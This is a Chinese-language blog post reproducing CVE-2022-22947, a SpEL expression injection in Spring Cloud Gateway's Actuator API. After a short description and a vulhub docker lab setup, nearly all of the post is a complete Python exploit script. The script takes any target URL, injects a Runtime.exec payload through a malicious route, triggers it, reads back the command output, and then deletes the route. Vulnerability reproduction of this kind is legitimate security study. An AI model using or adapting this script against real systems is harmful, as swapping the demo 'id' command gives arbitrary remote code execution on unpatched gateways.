Spring-CVE-2022-22947复现

CTF

Spring-CVE-2022-22947复现

lion 2022 年 03 月 26日

简介：

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问Actuator API的情况下，将可以利用该漏洞执行任意命令。

漏洞环境：

docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0

访问8080端口:

https://s1.ax1x.com/2022/03/26/qamvHf.png

POC:

import requests
import json
import re
#添加路由
print("cve")
url_host = input("请输入要测试的地址:")

data = {
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/json',
           'Connection': 'close',
           'Accept': '*/*',
           'Accept-Language': 'en',
           }
try:
    url =  url_host + "/actuator/gateway/routes/hacktest"
    res = requests.post(url=url,data=json.dumps(data),headers=headers)
    print(res.text)
    print(res.status_code)
except Exception as e:
    print("输入地址有误请重试")
    exit(1)

#刷新路由

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Connection': 'close',
           'Content-Length': '0',
           'Accept': '*/*',
           'Accept-Language': 'en',
           }

url =  url_host + "/actuator/gateway/refresh"
res = requests.post(url=url,headers=headers)
print(res.text)
print(res.status_code)

#执行过程

url =  url_host + "/actuator/gateway/routes/hacktest"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Content-Length': '0',
           'Connection': 'close',
           'Accept': '*/*',
           'Accept-Language': 'en',
           }
try:
    res = requests.get(url=url,headers=headers)
    print(res.text)
    print((re.search(r".*AddResponseHeader Result =(.*)",res.json()["filters"][0])).group(1).replace(r"'",""))
    # [[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)'], order = 1]
    print(res.status_code)
except Exception as e:
    print("漏洞不存在")
    exit(1)

#删除路由
url =  url_host + "/actuator/gateway/routes/hacktest"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Connection': 'close',
           'Accept': '*/*',
           'Accept-Language': 'en',
           }

res = requests.delete(url=url,headers=headers)
print(res.text)
print(res.status_code)

#最后一步刷新路由

url =  url_host + "/actuator/gateway/refresh"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Connection': 'close',
           'Content-Length': '0',
           'Accept': '*/*',
           'Accept-Language': 'en',
           }

res = requests.post(url=url,headers=headers)
print(res.text)
print(res.status_code)
print("存在漏洞")

可以执行id命令，就代表存在，反之就不存在。

CTF Linux

